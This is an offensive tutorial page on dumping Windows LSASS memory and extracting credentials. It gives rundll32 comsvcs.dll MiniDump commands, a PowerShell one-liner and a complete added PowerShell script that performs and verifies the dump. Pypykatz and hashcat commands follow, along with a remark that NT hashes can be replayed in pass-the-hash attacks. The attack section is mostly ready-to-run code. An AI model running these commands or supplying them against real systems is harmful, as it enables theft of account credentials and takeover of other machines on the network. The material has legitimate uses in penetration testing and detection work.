Attacking LSASS
LSASS (Local Security Authority Subsystem Service) is the Windows process (`lsass.exe`) that enforces the local security policy. It authenticates users logging on to a workstation or server, handles password changes and creates access tokens. Because it holds the credential material (NT hashes, Kerberos tickets and, depending on configuration, cleartext passwords) of every logged-on user in memory, a copy of its memory is one of the most valuable artifacts an attacker with local administrator rights can obtain.
Dumping LSASS
There are many ways to dump the LSASS process; several of them are described below. The best-known tool for the job is Mimikatz, but the method shown here needs nothing beyond binaries that ship with Windows.
Using Rundll32.exe
!!! Note
    Most antivirus and EDR products classify this action as malicious and will raise an alert or block it outright. Expect the dump attempt itself to be logged even when it succeeds.
To perform this action you need at least local administrator rights on the victim machine, and the Command Prompt or PowerShell must be started as an elevated process: the `MiniDump` export of `comsvcs.dll` needs `SeDebugPrivilege` to open a handle to LSASS, and only an elevated administrator token carries that privilege.
1. Determine the PID of the `lsass.exe` process with the Command Prompt:

    ```
    tasklist /svc | findstr "lsass.exe"
    ```

    or with PowerShell:

    ```
    Get-Process lsass
    ```
2. Create the `lsass.exe` dump, substituting the PID found in the previous step (672 in this example):

    ```
    rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\temp\lsass.dmp full
    ```

    The destination folder (`C:\temp` here) must already exist; rundll32 does not create it and does not report the failure.
An alternative is the following one-liner in an elevated PowerShell session. It resolves the PID of `lsass.exe`, passes it straight to the `MiniDump` action and writes the `.dmp` file to the `C:\temp` folder; `Wait-Process` then blocks until rundll32 has finished writing. Note that it waits for every `rundll32.exe` on the system, not only the one started here.

```
rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id C:\temp\lsass.dmp full;Wait-Process -Id (Get-Process rundll32).id
```
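The two steps above, combined into one script with the checks a practitioner wants before walking away from the console: an elevation check, creation of the output folder, waiting for the specific rundll32 that was started, and a check that what landed on disk is actually a minidump. This is an added example, not code from the original page; the paths in `$DumpDir` and `$DumpPath` are assumptions and can be changed freely.

```powershell
# Added example (not from the original page): dump LSASS through comsvcs.dll!MiniDump
# and verify the result. Must be run from an elevated (Administrator) PowerShell.
$DumpDir  = 'C:\temp'                       # assumption: any writable folder will do
$DumpPath = Join-Path $DumpDir 'lsass.dmp'

# 1. Refuse to continue unless the session is elevated; without SeDebugPrivilege the
#    MiniDump export cannot open LSASS and simply produces nothing.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object Security.Principal.WindowsPrincipal $identity
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    throw 'Run this from an elevated PowerShell session.'
}

# 2. Resolve the LSASS PID. There is exactly one lsass.exe, so .Id is a single integer.
$lsassPid = (Get-Process -Name lsass).Id

# 3. rundll32 will not create the directory for you; an absent folder yields a missing
#    dump with no error message. Remove a stale dump so a later size check is meaningful.
if (-not (Test-Path $DumpDir)) { New-Item -ItemType Directory -Path $DumpDir | Out-Null }
if (Test-Path $DumpPath) { Remove-Item $DumpPath -Force }

# 4. Launch rundll32 with the same argument string as the manual command and wait for
#    that specific process, not for every rundll32.exe on the machine.
$rundll = Start-Process -FilePath "$env:SystemRoot\System32\rundll32.exe" `
    -ArgumentList "$env:SystemRoot\System32\comsvcs.dll, MiniDump $lsassPid $DumpPath full" `
    -PassThru -Wait -NoNewWindow

# 5. Verify: a usable minidump begins with the ASCII signature 'MDMP'. An AV/EDR block
#    typically shows up here as a missing file or a zero-length file.
if (-not (Test-Path $DumpPath)) {
    throw "No dump written (rundll32 exit code $($rundll.ExitCode)); AV/EDR may have blocked it."
}
$stream = [IO.File]::OpenRead($DumpPath)
$header = New-Object byte[] 4
[void]$stream.Read($header, 0, 4)
$stream.Close()
$magic = [Text.Encoding]::ASCII.GetString($header)
if ($magic -ne 'MDMP') {
    throw "Unexpected header '$magic'; $DumpPath is not a minidump."
}
'{0} written: {1:N0} bytes, LSASS PID {2}' -f $DumpPath, (Get-Item $DumpPath).Length, $lsassPid
```

Reading only the first four bytes keeps the check cheap; a full dump of a busy server is easily tens of megabytes. If the script reports a file with the right signature but a tiny size, the dump was interrupted, usually by a security product, and the credentials will not be in it.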
Extract Credentials
Pypykatz is a pure-Python implementation of Mimikatz. It parses the `lsass.dmp` file offline, so the dump can be copied to any machine (typically the attacker's Linux box) and the credentials extracted there, where Mimikatz itself would never have to run.
1. Dump the hashes from `lsass.dmp`. Root privileges are not needed for this step; the `sudo` that is often seen in front of the command is unnecessary:

    ```
    pypykatz lsa minidump lsass.dmp
    ```
2. Crack the hashes with hashcat. pypykatz prints one block per logon session; copy the values from its `NT:` lines into `hashes.txt`, one hash per line (or `user:hash` lines if you run hashcat with `--username`):

    ```
    hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
    ```

    `-m 1000` selects hash mode 1000, which hashcat labels "NTLM": the NT hash, i.e. MD4 of the UTF-16LE password. Cracking is only needed if the cleartext password is wanted; an NT hash can be replayed as-is in pass-the-hash attacks against any service that accepts NTLM authentication.